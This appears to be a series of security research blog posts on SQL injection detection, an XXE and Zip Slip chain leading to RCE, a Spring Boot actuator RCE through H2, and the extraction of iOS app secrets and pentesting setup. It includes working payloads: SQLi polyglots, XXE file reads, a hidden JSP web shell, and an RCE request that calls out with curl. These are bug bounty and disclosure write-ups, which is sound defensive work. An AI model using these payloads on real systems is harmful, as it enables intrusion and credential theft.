spaceraccoon.dev

Motivation

Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities.

Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response.

For SQL injections, the best case scenario is that you get a verbose stack trace that tells you exactly what you need:

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8

<div id="error">
    <h1>Database Error</h1>
    <div class='message'>
        SQL syntax error near '''' where id=123' at line 1: update common_member SET name=''' where id=123
    </div>
</div>

If you see this, it's your lucky day. More often, however, you will either get a generic error message, or worse, no error at all – only an empty response.

HTTP/1.1 200 OK
Content-Type: application/json

{
    "users": []
}

As such, hunting SQL injections can be arduous and time-consuming. Many researchers prefer to do a single pass with automated tools like sqlmap and call it a day. However, running these tools without specific configurations is a blunt instrument that is easily detected and blocked by Web Application Firewalls (WAF). Furthermore, SQL injections occur in unique contexts; you might be injecting after a WHERE or LIKE or ORDER BY and each context requires a different kind of injection. This is even before various sanitization steps are applied.

Polyglots help researchers use a more targeted approach. However, polyglots, by their very definition, try to execute in multiple contexts at once, often sacrificing stealth and succinctness. Take for example the SQLi Polyglots from Seclists:

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/

Any half-decent WAF would pick up on these payloads and block them.

In real-world scenarios, researchers need to balance two concerns when searching for SQL injections:

  1. Ability to execute and thus identify injections in multiple contexts
  2. Ability to bypass WAFs and sanitization steps

A researcher can resolve this efficiently with something I call Isomorphic SQL Statements (although I'm sure other researchers have different names for it).

Incremental Approaches to Discovering Vulnerabilities

Going back to the XSS analogy, while XSS scanners and fuzzing lists are a dime a dozen, they usually don't work too well due to the above mentioned WAF blocking and unique contexts. Recently, more advanced approaches to automated vulnerability discovery have emerged which try to address the downsides of bruteforce scanning, like James Kettle's Backslash Powered Scanning. As Kettle writes,

Rather than scanning for vulnerabilities, we need to scan for interesting behaviour.

In turn, automation pipeline tools like Ameen Mali's qsfuzz and Project Discovery's nuclei test against defined heuristic rules (“interesting behaviour”) rather than blindly bruteforcing payloads. This is the path forward for large-scale vulnerability scanning as more organizations adopt WAFs and better development practices.

For example, when testing for an XSS, instead of asking “does an alert box pop when I put in this payload?”, I prefer to ask “does this application sanitize single quotes? How about angle brackets?” The plus side of this is that you can easily automate this on a large scale without triggering all but the most sensitive WAFs. You can then follow up with manual exploitation for each unique context.

The same goes for SQL injections. But how do you formulate your tests without any feedback mechanisms? Remember that SQL injections differ from XSS in that usually no (positive) response is given. Nevertheless, one thing I've learned from researchers like Ian Bouchard is that even no news is good news.

This is where Isomorphic SQL Statements come into play. Applied here, isomorphic simply means SQL statements that are written differently but theoretically should return the same output. However, the difference is that you will be testing SQL statements which include special characters like ' or -. If the characters are properly escaped, the injected SQL statement will fail to evaluate to the same result as the original. If they aren't properly escaped, you'll get the same result, which indicates an SQL injection is possible.

Let's illustrate this with a simple toy SQL injection:

CREATE TABLE Users (
    ID int key auto_increment,
    LastName varchar(255),
    FirstName varchar(255),
    Address varchar(255),
    City varchar(255)
);

INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Bird', 'Big', '123 Sesame Street', 'New York City'); 

INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Monster', 'Cookie', '123 Sesame Street', 'New York City'); 

SELECT FirstName FROM Users WHERE ID = <USER INPUT>;

If you are fuzzing with a large list of SQL polyglots, it would be relatively trivial to pick up the injection, but in reality the picture will be complicated by WAFs, sanitization, and more complex statements.

Next, consider the following statements:

SELECT FirstName FROM Users WHERE ID = 1;
SELECT FirstName FROM Users WHERE ID = 2-1;
SELECT FirstName FROM Users WHERE ID = 1+'';

They should all evaluate to the same result if the special characters in the last two statements are injected unsanitized. If they don't evaluate to the same results, the server is sanitizing them in some way.

DB Fiddle

Now consider a common version of a search query, SELECT Address FROM Users WHERE FirstName LIKE '%<USER INPUT>%' ORDER BY Address DESC;:

SELECT Address FROM Users WHERE FirstName LIKE '%Big%' ORDER BY Address DESC;
SELECT Address FROM Users WHERE FirstName LIKE '%Big%%%' ORDER BY Address DESC;
SELECT Address FROM Users WHERE FirstName LIKE '%Big%' '' ORDER BY Address DESC;

Simply by injecting the same special character % twice in the second statement, we are given a clue about the actual SQL statement you are injecting into (it's after a LIKE operator) if you receive the same response back.

Even better, as Arne Swinnen noted way back in 2013 (a pioneer!):

Strings: split a valid parameter’s string value in two parts, and add an SQL string concat directive in between. An identical response for both requests would again give you reason to believe you have just hit an SQL injection.

We can achieve the same isomorphic effect for strings as numeric IDs simply by adding ' ' to our injection in the third statement. This is interpreted as concatenating the original string with a blank string, which should also return the same response while indicating that ' isn't being properly escaped.

From here, it is a simple matter of experimenting incrementally. You thus achieve two objectives:

  1. Discover which injectable characters are entered unsanitized into the final SQL statement
  2. Discover the original SQL statement you are injecting into

Mass Automation and Caveats

The goal of this is not only to discover individual SQL injections, but to be able to automate and apply this across large numbers of URLs and inputs. Traditional SQL injection payload lists or scanners make large-scale scanning noisy and resource-intensive. With the incremental isomorphic approach, you apply a heuristic rule like:

if (response of id_input) === (response of id_input + "+''"):
    return true
else:
    return false

This is much lighter and faster. Of course, while you gain in terms of fewer false negatives (e.g. polyglots that work but are blocked by WAFs), you lose in terms of more false positives. For example, there are cases where the backend simply trims all non-numeric characters before entering an SQL statement, in which case the above isomorphic statement would still succeed. Thus, rather than relying on a single isomorphic statement (binary signal), you will want to watch for multiple isomorphic statements succeeding (spectrum signal).

Although SQL injections are getting rarer, I've still come across them occasionally in manual tests. A mass scanning approach will yield even better results.

XML and ZIP – A Tale as Old As Time

While researching a bug bounty target, I came across a web application that processed a custom file type. Let's call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.

This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:

Archive:  Document.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
  inflating: word/settings.xml       
  inflating: docProps/core.xml       
  inflating: word/fontTable.xml      
  inflating: word/webSettings.xml    
  inflating: word/styles.xml         
  inflating: docProps/app.xml        

Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.

However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.

Here's a quick overview of these “vulnerable features.”

XML External Entities

The XML file format supports external entities, which allow an XML file to pull data from other sources, such as local or remote files. In some cases this can be useful because it makes importing data from various sources more convenient. However, in cases where an XML parser accepts user-defined inputs, a malicious user can pull data from sensitive local files or internal network hosts.

As the OWASP Foundation wiki states:

This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser... Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use.

Just like in my previous Remote Code Execution writeup, developers are put at risk by vulnerable defaults.

ZIP Directory Traversal

Although ZIP directory traversal has been exploited since the format's inception, this attack vector gained prominence in 2018 due to Snyk's clumsily-named “Zip Slip” research/marketing campaign that found the vulnerability in many popular ZIP parser libraries.

An attacker can exploit this vulnerability with a ZIP file that contains directory traversal filenames such as ../../../../evil1/evil2/evil.sh. When a vulnerable ZIP library tries to unzip this file, rather than unzipping evil.sh to a temporary directory, it unzips it to another location in the filesystem defined by the attacker (in this case, /evil1/evil2). This can easily lead to remote code execution if an attacker overwrites a cron job script or creates a web shell in the web root directory.

Similar to XXEs, ZIP directory traversal is especially common in Java:

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand-crafted and shared among developer communities such as StackOverflow.

Discovering the XXE

Now that we have the theoretical foundations of the attack, let's move on to the actual vulnerability in practice. The application accepted uploads of the custom file type, unzipped them, parsed the XML manifest file, and returned a confirmation page with the manifest details. For example, if mypackage.xyz was a ZIP file containing the following manifest.xml:

<?xml version="1.0"?>
<packageinfo>
    <title>My Awesome Package</title>
    <author>John Doe</author>
    <documentation>https://google.com</documentation>
    <rating>4.2</rating>
</packageinfo>

I would get the following confirmation screen:

Package Info 1

The first thing I did was test for XSS. One tip about injecting XSS via XML is that XML doesn't support raw <htmltags> because this gets interpreted as an XML node, so you have to escape them in the XML like &lt;htmltags&gt;. Unfortunately, the output was sanitized properly.

The next move was to test for XXEs. Here, I made a mistake and began by testing for a remote external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM 'https://mycollab.burpcollaborator.net'>]>
<packageinfo>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>
    <documentation>https://google.com</documentation>
    <rating>4.2</rating>
</packageinfo>

I didn't get a pingback on my Burp Collaborator instance and immediately assumed XXEs were blocked. This is a mistake because you should always test incrementally, starting with non-system external entities, working your way up to local files, and then remote files. This helps you eliminate various possibilities along the way. After all, a standard firewall rule would block outgoing web connections, causing a remote external entity to fail. However, this does not necessarily mean local external entities are blocked.

Fortunately, I decided to try again later with a local external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM 'file:///etc/hosts'>]>
<packageinfo>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>
    <documentation>https://google.com</documentation>
    <rating>4.2</rating>
</packageinfo>

That's when I struck gold. The contents of /etc/hosts appeared in the confirmation page.

Package Info 2

Pivoting to RCE

Typically in a white hat hacking scenario, you stick to a non-destructive proof-of-concept and stop there. With the XXE, I could expose local database files and several interesting web logs that included admin credentials. This was sufficient to write up a report.

However, there was another vulnerability I wanted to test: the ZIP parser. Remember that the app unzipped the package, read the manifest.xml file, and returned a confirmation page. I found an XXE in the second step, suggesting that there might be additional vulnerabilities in the rest of the flow.

To test for ZIP directory traversal, I used evilarc, a simple Python 2 script to generate ZIP files with directory traversal payloads. I needed to figure out where I wanted to place my traversal payload in the local file system. Here, the XXE helped. Local external entities support not just files but also directories, so if I used an external entity like file:///nameofdirectory, instead of the contents of a file, it would list the contents of the directory.

With a little digging through the directories, I eventually came across a file located at /home/web/resources/templates/sitemap.jsp. Its contents matched a page in the application – https://vulnapp.com/sitemap. I zipped the contents of the sitemap page along with a web shell as ../../../../../../home/web/resources/templates/sitemap.jsp in my package. I kept the web shell hidden via a secret URL parameter to prevent casual users from accidentally coming across it:

<%@ page import="java.util.*,java.io.*"%>
<%
    if (request.getParameter("spaceraccoon") != null) {
        out.println("Command: " + request.getParameter("spaceraccoon") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("spaceraccoon"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            out.println(disr); 
            disr = dis.readLine(); 
        }
        out.println("<BR>");
    }
%>
<ORIGINAL HTML CONTENTS OF SITEMAP>

I uploaded my package, browsed to https://vulnapp.com/sitemap?spaceraccooon=ls and... nothing. The page looked exactly the same.

A common saying goes:

The definition of insanity is doing the same thing over and over again and expecting a different result.

This does not apply to black box testing. Latency, caching, and other quirks of the web can return different outputs for the same input. In this case, the server had cached the original version of https://vulnapp.com/sitemap, which is why it initially returned the page without my web shell. After several refreshes, my web shell kicked in, and the page returned the contents of the web root directory along with the rest of the sitemap page contents. I was in.

Convention over Configuration

Configuration Meme

From the writeup, you might have noticed that I was dealing with a Java application. This brings us back to OWASP and Snyk's warnings that Java is uniquely prone to mishandling XML and ZIP files. Due to a combination of unsafe defaults and a lack of default parsers, developers are forced to rely on random Stack Overflow snippets or third-party libraries.

However, Java is not the only culprit. Mishandling XML and ZIP files occurs across all programming languages and frameworks. Developers are expected to go out of their way to configure third-party libraries and APIs safely, which makes it easy to introduce vulnerabilities into an application. A developer only needs to make one mistake to introduce a vulnerability in their application. The probability of this increases with every additional “black box” library.

One approach to reduce vulnerabilities in development is Spotify's “Golden Path“:

At Spotify, one of our engineering strategies is the creation and promotion of the use of “Golden Paths.” Golden Paths are a blessed way to build products at Spotify. They consist of a set of APIs, application frameworks, best practices, and runtime environments that allow Spotify engineers to develop and deploy code safely, securely, and at scale. We complement these with opt-in programs that help increase quality. From our bug bounty program reports, we’ve found that the more that development adheres to a Golden Path, the less likely there is to be a vulnerability reported to us.

This boils down to a simple Ruby on Rails maxim: “Convention over configuration.”

Rather than relying on thousands of engineers to individually remember all the quirks of web application security, it is a lot more efficient to focus on a battle-tested set of frameworks and APIs and reduce the need to constantly tweak these settings.

Fortunately, organizations can solve this in a systemic manner by adhering to convention over configuration.

Major thanks to the security team behind the bug bounty program, who fixed the vulnerability in less than 12 hours and gave the go-ahead to publish this writeup.

Prelude

The Spring Boot framework is one of the most popular Java-based microservice frameworks that helps developers quickly and easily deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process.

However, these development defaults can become dangerous in the hands of inexperienced developers. My write-up expands on the work of Michal Stepankin, who researched ways to exploit exposed actuators in Spring Boot 1.x and achieve RCE via deserialization. I provide an updated RCE method via Spring Boot 2.x's default HikariCP database connection pool and a common Java development database, the H2 Database Engine. I also created a sample Spring Boot application based on Spring Boot's default tutorial application to demonstrate the exploit.

Let's begin with the final payload:

POST /actuator/env HTTP/1.1

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream());  if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('curl  http://x.burpcollaborator.net');"}

The payload comprises of three different parts: the environment modification request to the /actuator/env endpoint, the CREATE ALIAS H2 SQL command, and of course the final OS command injection.

Act One: Exposed Actuators

Spring Boot Actuators creates several HTTP endpoints that allows a developer to easily monitor and manage an application. As Stepankin notes, Starting with Spring version 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers. For this exploit, the /actuator/env endpoint must be exposed. Developers only need to add management.endpoints.web.exposure.include=env (or worse, management.endpoints.web.exposure.include=*) to their application.properties configuration file to expose this.

The /actuator/env endpoint includes the GET and POST methods to retrieve and set the application's environment variables. The POST request uses the following format:

POST /actuator/env HTTP/1.1

{"name":"<NAME OF VARIABLE>","value":"<VALUE OF VARIABLE>"}

You can explore the list of environment variables for the application, which provide data about the execution context and system. However, only a few of these variables can be leveraged to change the app at runtime, and even fewer can be used to achieve code execution. Fortunately, Spring Boot 2.x uses the HikariCP database connection pool by default, which introduces one such variable.

Act Two: H2 CREATE ALIAS Command

HikariCP helps applications communicate with databases. According to its documentation, it accepts the connectionTestQuery configuration which defines the query that will be executed just before a connection is given to you from the pool to validate that the connection to the database is still alive. The matching Spring Boot environment variable is spring.datasource.hikari.connection-test-query. In short, whenever a new database connection is created, the value of spring.datasource.hikari.connection-test-query will be executed as an SQL query first. There are two ways to trigger a new database connection – either by restarting the app with a request to POST /actuator/restart or changing the number of database connections and initializing it by making multiple requests to the application.

This is already pretty serious – you can run arbitrary SQL queries and drop the database if you want. However, let's escalate this further and look into the H2 Database Engine, one of the most popular Java development databases. Think of it as a Java-based SQLite, but extremely easy to integrate into Spring Boot. It only requires one dependency. As such, it's commonly used in Spring Boot development.

Matheus Bernardes highlighted an important SQL command included in H2: CREATE ALIAS. Similar to PostgreSQL's User-Defined Functions, you can define a Java function corresponding to the alias and subsequently call it in an SQL query like you would a function.

CREATE ALIAS GET_SYSTEM_PROPERTY FOR "java.lang.System.getProperty";
CALL GET_SYSTEM_PROPERTY('java.class.path');

Of course, you can use Java's Runtime.getRuntime().exec function, which allows you to execute OS commands directly.

Act Three: Command Injection against WAFs and Limited Execution Contexts

At this point, you might come up against common WAF filters especially with juicy strings like exec() and so on. However, one advantage of such a nested payload is that you can easily find bypasses using various string concatenation techniques. RIPStech's Johannes Moritz demonstrates this by breaking up the query using the CONCAT and HEXTORAW commands:

CREATE ALIAS EXEC AS CONCAT('void e(String cmd) throws java.io.IOException',
HEXTORAW('007b'),'java.lang.Runtime rt= java.lang.Runtime.getRuntime();
rt.exec(cmd);',HEXTORAW('007d'));
CALL EXEC('whoami');

Another challenge is that you might be executing code in an extremely limited context. The application might be running in a Dockerized instance without internet access and with limited commands available; Alpine Linux, the most common Linux distribution in Docker, doesn't even have Bash. Additionally, the exec() function executes raw OS commands rather than in a shell, removing helpful tools like boolean comparisons, pipes, and redirections.

Here, it helps to zoom out a little and approach the payload in a holistic manner. Remember that the point of spring.datasource.hikari.connection-test-query is to validate whether the connection to the database is still alive. If the query fails, the application will believe that the database is not reachable and no longer return other database queries. An attacker can leverage this to get a blind RCE where instead of a command like curl x.burpcollaborator.net, they run grep root /etc/passwd. This returns output (since /etc/passwd does include the root string) and thus the query succeeds. The application continues to function normally. If they run grep nonexistent /etc/passwd, the command returns no output, the Java code throws an error, and the query fails, causing the app to fail.

String shellexec(String cmd) throws java.io.IOException {
 java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream());
 if (s.hasNext()) {
  return s.next();  // OS command returns output; return output and SQL query succeeds
 }
 throw new IllegalArgumentException(); // OS command fails to return output; throw exception and SQL query fails
}

This is an interesting way to tie together the three components of the payload to still prove code execution within a limited context. Many thanks to Ian Bouchard for pointing out the possibilities for a blind RCE.

Hopefully, you don't have to deal with that and can get a simple curl pingback instead, like my example vulnerable Spring Boot application.

Burp Collaborator

Conclusion: Dangerous Development Defaults

By exposing the /actuator/env and /actuator/restart endpoints – pretty common in a development setting – a developer puts their application at risk of remote code execution. Of course, this wouldn't be a problem if the application is run locally, but it's not a stretch to imagine a careless developer putting it on a public IP during proptyping.

A common theme running through this write-up and the associated write-ups is that developers can easily introduce severe vulnerabilities in their code without knowing it. Actuators and the H2 database are useful tools to speed up development and prototyping, but exposing them creates a remote code execution vulnerability by default.

#springboot #pentest #cybersecurity #h2 #java

Motivation

Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it's also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.

Most iOS applications use third-party APIs and SDKs such as Twitter, Amazon Web Services, and so on. Interacting with these APIs require API keys which are used (and thus stored) in the app itself. A careless developer could easily leak keys with too many privileges or keys that were never meant to be stored on the client-side in the first place.

What makes finding them an easy win? As described by top iOS developer Mattt Thompson:

There’s no way to secure secrets stored on the client. Once someone can run your software on their own device, it’s game over.

And maintaining a secure, closed communications channel between client and server incurs an immense amount of operational complexity — assuming it’s possible in the first place.

He also tells us that:

Another paper published in 2018 found SDK credential misuse in 68 out of a sample of 100 popular iOS apps. (Wen, Li, Zhang, & Gu, 2018)

Until APIs and developers come round to the fact that client secrets are insecure by design, there will always be these low-hanging vulnerabilities in iOS apps.

Techniques

Mattt Thompson shared three ways developers can (insecurely) store client secrets in their apps:

  1. Hard-code secrets in source code
  2. Store secrets in Info.plist
  3. Obfuscate secrets using code generation

For the first two methods, we can simply expose these secrets using static analysis and grepping through the decrypted app files as covered by Ivan Rodriguez. For obfuscated secrets, we can short-circuit the obfuscation and save ourselves hours of reverse-engineering through the magic of Frida's dynamic analysis. This was how I extracted AWS client and secret keys for a bug bounty program.

The following walkthrough assume that you have set up your iOS testing environment according to my iOS app pentesting quickstart post.

Static Analysis

Static analysis begins with extracting your target .ipa file. Make sure that you have installed iproxy and frida-ios-dump.

  1. In one terminal, run iproxy 2222 22
  2. Open the target app on your iDevice
  3. In another terminal, run ./dump.py <APP DISPLAY NAME OR BUNDLE IDENTIFIER>
  4. You should now have a <APPNAME>.ipa file in your current directory
  5. mv <APPNAME>.ipa <APPNAME>.zip
  6. unzip <APPNAME>.zip
  7. The files are now unzipped to a Payload folder; open it up and check that an <APPNAME>.app file has been created (<APPNAME> might differ between the .ipa and .app files)
  8. mkdir AppFiles
  9. mv Payload/<APPNAME>.app/* AppFiles/

At this point, you should see a bunch of files in the AppFiles directory. While the files obviously differ from app to app, here are a few keys files to look into.

Info.plist and other *.plist files: Info.plist functions similarly to manifest.json for Android apps. It contains app metadata and can point out weaknesses or new attack surfaces such as custom scheme URLs. Of course, it can also contain stored credentials. You can use macOS' built-in plutil command to lay out the data nicely in JSON with plutil -p Info.plist.

Some plist files can be stored in binary rather than XML, which makes it harder to parse directly. Run plutil -convert xml1 Info.plist to convert them back to XML.

Quick tip: while GoogleService-Info.plist exists on many apps and includes an extremely juicy-looking API_KEY value, this is not a sensitive credential. It needs to be paired with a custom token to have any impact. Not all API keys are created equal; some have proper access controls and can be exposed without risk. Check out keyhacks to quickly identify and validate sensitive API keys.

You also want to begin grepping and parsing through the various files; grep "API_KEY" -r * or similar is a quick and dirty solution.

At this point, you should also poke at interesting files that hint at vulnerable functionality. Check html files (maybe an internal URL scheme vulnerable to DOM XSS?), templates, and third-party frameworks that could have known vulnerabilities.

With luck, you might walk away with a straightforward credential exposure.

Dynamic Analysis

Most times, it won't be that straightforward. Nevertheless, there are clues that might point you towards obfuscated credentials.

In one bug bounty program, I noticed that the app I was testing uploaded profile pictures to an S3 bucket, but the request was hidden from interception and the credentials were not stored in plaintext in the app files. Nevertheless, given that the upload was occurring, it was a safe bet to assume that credentials were being exchanged.

At this point, I could dive into the binary with Ghidra and attempt to walk through the obfuscated code to decrypt the credentials, but there is a way to short-circuit this whole process.

Think of it this way: at the end of the day, no matter how much obfuscation is used, the credentials need to be sent in plaintext (for insecure implementations) to the server. For that to happen, a method needs to be invoked somewhere in the code using these credentials.

This is where Frida and Objection comes in. You want to hook onto the method that makes that call, and dump the arguments to that method – which should hopefully be the credentials you are looking for.

First, you need to identify the method. Fire up Objection with objection --gadget <APPNAME> explore. Next, run ios hooking list classes to dump all available classes in the app. This is a huge list. Grep through the list and identify interesting classes. For example, I looked for the classes with AWS or Amazon in the name. As luck would have it, there was an AWSCredentials class, among other interesting class names.

Objection console

Next, you want to begin watching these classes. Run ios hooking watch class <CLASSNAME> in the Objection console for each class. Now, perform the action in the app where the potentially vulnerable credentials could be exposed. In this case, I performed the profile picture upload function in the app, which triggered the following response:

(agent) Watching method: - initKey:
(agent) Watching method: - initSDK:
(agent) Registering job gk6i5disc88. Type: watch-class-methods for: AWSCredentials
myApp on (iPhone: 13.1.2) [usb] # (agent) [gk6i5disc88] Called: [AWSS3Client initKey:] (Kind: instance) (Super: AWSClient)

Awesome. So it looks like Frida successfully hooked onto the AWSCredentials class which includes the initKey and initSDK methods. When I performed the profile picture upload, the initKey method was called.

Now, we want to dump the arguments passed into the initKey class method. In objection, run ios hooking watch method "-[AWSCredentials initKey:]" --dump-args. Note that the format here for the class method is "-[<CLASSNAME> <METHOD>:]". Once again, I performed the profile picture upload in the app.

(agent) [gk6i5disc88] Called: -[AWSCredentials initKey:] 1 argument(Kind: instance) (Super: NSObject)
(agent) [gk6i5disc88] Argument dump: [AWSCredentials initKey: <AWS CLIENT KEY>:<AWS SECRET KEY>]

Success! Using dynamic analysis, I exposed the AWS keys used by the application. Of course, this meant that the app was using an insecure communication protocol with S3 as there are credential-less ways of implementing S3 uploads.

Conclusion

Hunting for secrets in iOS apps is a low-effort, high-payoff task that can help ease you into pentesting an application. (Un)fortunately, secrets management remains a hard problem especially for less-experienced developers, and continues to crop up as a recurring vulnerability. It's easy to forget that credentials are still exposed even when compiled into an app binary.

#ios #pentest #cybersecurity #frida #aws

Motivation

I wanted to get into mobile app pentesting. While it's relatively easy to get started on Android, it's harder to do so with iOS. For example, while Android has Android Virtual Device and a host of other third-party emulators, iOS only has a Xcode's iOS Simulator, which mimics the software environment of an iPhone and not the hardware. As such, iOS app pentesting requires an actual OS device.

Moreover, it's a major hassle to do even basic things like bypassing SSL certificate pinning. Portswigger's Burp Suite Mobile Assistant needs to be installed onto a jailbroken device and only works on iOS 9 and below.

For the longest time, iOS pentesting guides recommended buying an old iPhone with deprecated iOS versions off eBay. More recent efforts like Yogendra Jaiswal's excellent guide are based on the Unc0ver jailbreak, which works on iOS 11.0-12.4. If you don't have an iDevice in that range, you're out of luck.

Fortunately, with the release off the checkra1n jailbreak, A5-A11 iPhone, iPad and iPods on the latest iOS can now be jailbroken. Many iOS app pentesting tools, having lain dormant during the long winter of jailbreaking, are now catching up and new tools are also being released.

As such, I'm writing quickstart guide for iOS app pentesting on modern devices with the checkra1n jailbreak and consolidating different tools' setup guides in one place. I will follow up with a post on bugs I've found on iOS apps using the tools installed here.

Quickstart

Hardware

Let's start with the basics. You need an A5-A11 iDevice, preferably an iPhone. I used an iPhone 8. Thanks to checkra1n, you don't really have to worry about the iOS version; as of now, it supports the latest iOS 13.3.

Unfortunately, checkra1n requires a macOS device for now, but Windows and Linux support is in the works.

Jailbreak

Warning: Jailbreaking your iDevice significantly weakens your security posture. You should not be doing this on your primary device. In fact, you should not use the jailbroken device for anything other than pentesting.

Take note that checkra1n is a semi-tethered jailbreak; every time you restart the iPhone, the jailbreak is lost, so you have to do this again.

  1. Download the latest checkra1n jailbreak at https://checkra.in/
  2. Connect your iPhone to your macOS device and open checkra1n with Applications → Right click checkra1n → Open.
  3. Unlock your iPhone and click “Start” in checkra1n
  4. Follow the rest of the steps in checkra1n and restart as necessary

checkra1n

Congrats! You have a jailbroken iPhone. Let's get down to business.

Cydia

This is super simple. On the jailbroken iPhone, open up the checkra1n app, then click “Cydia” in the “Install” section.

checkra1n app

Now you have Cydia and can install several packages that will help in your testing. More on that later.

iProxy

While you can SSH into your iPhone over the wireless network, it's a lot faster and more reliable to do that over USB.

  1. brew install libusbmuxd
  2. iproxy 2222 22
  3. In another terminal, run ssh root@localhost -p 2222
  4. For the password, enter alpine
  5. You should now have an SSH session in your iPhone

One perk is that you can also transfer files to and from your iPhone over SFTP using a client like FileZilla. Just select the SFTP protocol, set your host to localhost and port to 2222.

FileZilla settings

Frida and Objection

It's time to install my two favorite mobile app testing tools, Frida and Objection. I won't go through in detail about their usage here, just the set up. Frida has an iOS guide I will refer to.

  1. On your macOS device, run pip3 install frida-tools
  2. On your iPhone, open Cydia and add Frida’s repository by going to Sources → Edit → Add and enter https://build.frida.re
  3. Go to Search → Enter Frida → Install
  4. Back on your macOS device, run pip3 install objection
  5. Finally, run objection --gadget "com.apple.AppStore" explore to check that everything is integrated properly

Proxy Traffic and Bypass Cert Pinning

Proxying traffic through Burp Suite is fairly standard; follow the steps outlined in Yogendra Jaiswal's post.

  1. On Burp Suite, go to Proxy → Options → Proxy Listener → Add → Bind to port: 1337 → Bind to address : All interfaces (or select a Specific Address) → “OK”
  2. On your iPhone, Settings → Wi-Fi → Info → Configure Proxy → Manual → Set server and port to the ones from the previous step
  3. On your iPhone, go to http://burp → Click “CA Certificate” → Download profile → Settings → General → Profiles & Device Management → Portswigger CA → Install

Now traffic should be proxied through Burp – except for apps that utilize certificate pinning. Fortunately, the SSL Kill Switch 2 certificate pinning bypass tool was recently updated to support iOS 13.

  1. Make sure you have the following packages installed in Cydia: wget, Debian Packager, Cydia Substrate, PreferenceLoader
  2. Go to the SSL Kill Switch 2 release page and copy the link to the latest .deb release
  3. SSH into your iPhone (see the iProxy section above) and run wget <RELEASE URL FROM STEP 2>dpkg -i <DOWNLOADED PACKAGE NAME>killall -HUP SpringBoardrm <DOWNLOADED PACKAGE NAME>
  4. On your iPhone, go to Settings → SSL Kill Switch 2 (it should be at the bottom) → Disable Certificate Validation

SSL Kill Switch 2 settings

You should be good to go.

Bypass Jailbreak Detection

Jailbreak detection is annoying but solvable. Of all the packages that support iOS 13, I've found that the Liberty Lite Cydia module works the most consistently.

  1. On your iPhone, open Cydia and add module author Ryley Angus’ repository by going to Sources → Edit → Add and enter https://ryleyangus.com/repo/
  2. Go to Search → Enter Liberty Lite → Install
  3. Once installed, go to Settings → Liberty → Block Jailbreak Detection → Enable for the app you want to bypass

Kill and re-open your app. If it's still not bypassed, you can try other modules.

Liberty Lite settings

Dump App Files

Unlike Android apk files, iOS apps are stored as encrypted ipa files, preventing easy access and analysis. Having installed iproxy and Frida, we can use frida-ios-dump to do this at runtime.

  1. On your macOS device, git clone https://github.com/AloneMonkey/frida-ios-dump.git && cd frida-ios-dump
  2. sudo pip3 install -r requirements.txt --upgrade
  3. In another terminal, run iproxy 2222 22 if it's not already running
  4. To dump an app's file, ./dump.py <APP DISPLAY NAME OR BUNDLE IDENTIFIER>

Typically, I like to symlink to my tools so it's easily accessible from my PATH with ln -s <ABSOLUTE PATH TO dump.py> /usr/local/bin/dump-ipa. Now whenever I want to dump an app I can use the dump-ipa command anywhere.

Conclusion

With this quickstart guide, you now have the basic tools set up to begin iOS app pentesting, from searching for secrets in the app files, to hooking classes, and of course testing the web API. Best of all, this is on modern iOS hardware and versions.
